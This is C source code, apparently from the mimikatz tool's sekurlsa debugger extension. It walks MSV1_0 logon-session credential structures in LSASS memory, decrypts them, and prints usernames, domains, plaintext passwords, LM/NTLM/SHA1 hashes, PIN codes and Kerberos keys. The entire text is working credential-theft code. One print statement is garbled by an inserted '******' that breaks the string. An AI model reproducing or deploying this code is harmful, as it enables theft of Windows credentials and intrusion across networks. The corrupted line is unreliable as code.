void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { KIWI_MSV1_0_CREDENTIALS credentials; KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials; ULONG_PTR pPrimary, pCreds = (ULONG_PTR) pData->pCredentials; DWORD flags; while(pCreds) { if(ReadMemory(pCreds, &credentials, sizeof(KIWI_MSV1_0_CREDENTIALS), NULL)) { pPrimary = (ULONG_PTR) credentials.PrimaryCredentials; while(pPrimary) { if(ReadMemory(pPrimary, &primaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), NULL)) { if(kull_m_string_getDbgUnicodeString(&primaryCredentials.Credentials)) { if(kull_m_string_getDbgUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary)) { dprintf("\n\t [%08x] %Z", credentials.AuthenticationPackageId, &primaryCredentials.Primary); if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE)) flags = (NtBuildNumber < KULL_M_WIN_BUILD_10) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10; else if(RtlEqualString(&primaryCredentials.Primary, &CREDENTIALKEYS_STRING, FALSE)) flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY; else flags = 0; kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &primaryCredentials.Credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL | flags); LocalFree(primaryCredentials.Primary.Buffer); } LocalFree(primaryCredentials.Credentials.Buffer); } } else dprintf("n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"); pPrimary = (ULONG_PTR) primaryCredentials.next; } pCreds = (ULONG_PTR) credentials.next; } else dprintf("n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)"); } }
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags) { PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL; PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds; PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds; PKERB_HASHPASSWORD_6 pHashPassword; UNICODE_STRING buffer; PVOID base; DWORD type, i; if(mesCreds) { if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL) { type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK; credentials = (PUNICODE_STRING) mesCreds; if(credentials->Buffer) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length); switch(type) { case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY: pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer; kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE); kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE); dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName); if(pPrimaryCreds->isLmOwfPassword) { dprintf("\n\t * LM : "); kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds->isNtOwfPassword) { dprintf("\n\t * NTLM : "); kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds->isShaOwPassword) { dprintf("\n\t * SHA1 : "); kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0); } break; case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY: pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer; base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY); for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++) kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base); break; default: dprintf("\n\t * Raw data : "); kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE) { if(mesCreds->UserName.Buffer) { if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength); dprintf("\n\t * PIN code : %wZ", &mesCreds->UserName); LocalFree(mesCreds->UserName.Buffer); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST) { pHashPassword = (PKERB_HASHPASSWORD_6) mesCreds; dprintf("\n\t\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type)); if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size) { buffer.Buffer = (PWSTR) pHashPassword->Checksump; if(kull_m_string_getDbgUnicodeString(&buffer)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer.Buffer, buffer.MaximumLength); kull_m_string_dprintf_hex(buffer.Buffer, buffer.Length, 0); LocalFree(buffer.Buffer); } } else dprintf("<no size, buffer is incorrect>"); } else { if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer) { if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName) && kull_m_string_suspectUnicodeString(&mesCreds->UserName)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) username = &mesCreds->UserName; else domain = &mesCreds->UserName; } if(kull_m_string_getDbgUnicodeString(&mesCreds->Domaine) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) domain = &mesCreds->Domaine; else username = &mesCreds->Domaine; } if(kull_m_string_getDbgUnicodeString(&mesCreds->Password) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength); password = &mesCreds->Password; } if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY)) { dprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ? "%wZ\t%wZ\t" : "\n\t * Username : %wZ" "\n\t * Domain : %wZ" "\n\t * Password : "******"%.*S", password->Length / sizeof(wchar_t), password->Buffer); else dprintf("%wZ", password ? password : &uNull); } else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1); } LocalFree(mesCreds->UserName.Buffer); LocalFree(mesCreds->Domaine.Buffer); LocalFree(mesCreds->Password.Buffer); } } if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE) dprintf("\n"); } else dprintf("LUID KO\n"); }